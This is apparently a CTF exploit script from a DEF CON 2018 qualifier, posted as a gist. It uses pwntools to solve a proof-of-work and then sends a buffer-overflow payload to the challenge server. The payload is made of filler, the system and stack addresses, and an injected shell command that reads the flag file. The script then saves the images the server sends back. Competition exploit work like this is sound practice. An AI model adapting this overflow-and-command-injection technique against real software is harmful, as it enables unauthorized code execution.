@dwendt
Last active May 14, 2018 06:08
dc18 quals, all the good parts of this code belong to jeffball
from pwn import *
from pow import solve_pow
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode = fd.read()
#fd.close()
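def p32(v):
    """Pack *v* as a 4-byte big-endian word.

    Defined after ``from pwn import *`` on purpose: pwntools' own ``p32`` is
    little-endian, while this script builds addresses for a big-endian target
    (the commented-out ``m68k.bin`` line above suggests m68k).

    Args:
        v: integer value/address. It is reduced modulo 2**32 first, so the
           whole unsigned 32-bit range packs and negative values wrap to their
           two's-complement representation.

    Returns:
        4 bytes, most significant byte first.
    """
    # ">I" with a mask instead of the original ">i": the signed format raised
    # struct.error for any value >= 0x80000000, which a 32-bit address can be.
    # Values the old form accepted produce byte-identical output here.
    return struct.pack(">I", v & 0xFFFFFFFF)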
# Directory that receives each decoded "DEBUG" frame the service sends back.
folder = "/home/heart/dc18/ssz"

p = remote('ddee3e1a.quals2018.oooverflow.io', 31337)

# Proof-of-work banner: the challenge string sits on the line before "n: ",
# the modulus on the line before "Solution: ".
p.readuntil("Challenge: ")
challenge = p.readuntil("n: ").split("\n")[0]
n = int(p.readuntil("Solution: ").split("\n")[0])

# Leftovers from an earlier attempt; nothing below reads these three names.
shellcode = "\x42\x85\xcb\x89\xd2\xfc\x3e\x64\x4e\x91"
# stack 0x3fff694
# stack 0x3fff698
# stack 0x3fff54c
win = "/bin/wall /me/flag;"
padding = ";" * (263 - len(win)) + win
stack_loc = 0x3fff554

prewin = ";wall flag;"
win = "/usr/bin/open /me/flag;"
# Keep this filler as plain "A"s: the original author found that other bytes
# in this region break the run.
beforepc = "A" * (260 - len(prewin)) + prewin
system = 0x050307f8
stack_loc = 0x3fffa10  # a00 = http://aaaa

# Request line: filler, the two addresses above (big-endian), a separator,
# a run of backticks and finally the command string.
payload = "".join([
    'http://',
    beforepc,
    p32(system),
    p32(system),
    p32(stack_loc),
    ";",
    "`" * (0x200 - 1),
    win,
])
print(repr(payload))

print("solving {} {}".format(challenge, n))
solution = solve_pow(challenge, n)
p.writeline(str(solution))
print("solved...")

p.readuntil("?")
p.sendline(payload)

# Each frame arrives as one base64 line prefixed with "DEBUG "; write every
# decoded frame to <folder>/<i>.png. The loop is capped at 100000 iterations;
# presumably an EOF from the service is what actually ends it.
for i in range(100000):
    print(p.readuntil('DEBUG '))
    frame = p.readuntil('\n').decode('base64')
    with open(folder + '/%u.png' % i, 'w') as f:
        f.write(frame)

p.interactive()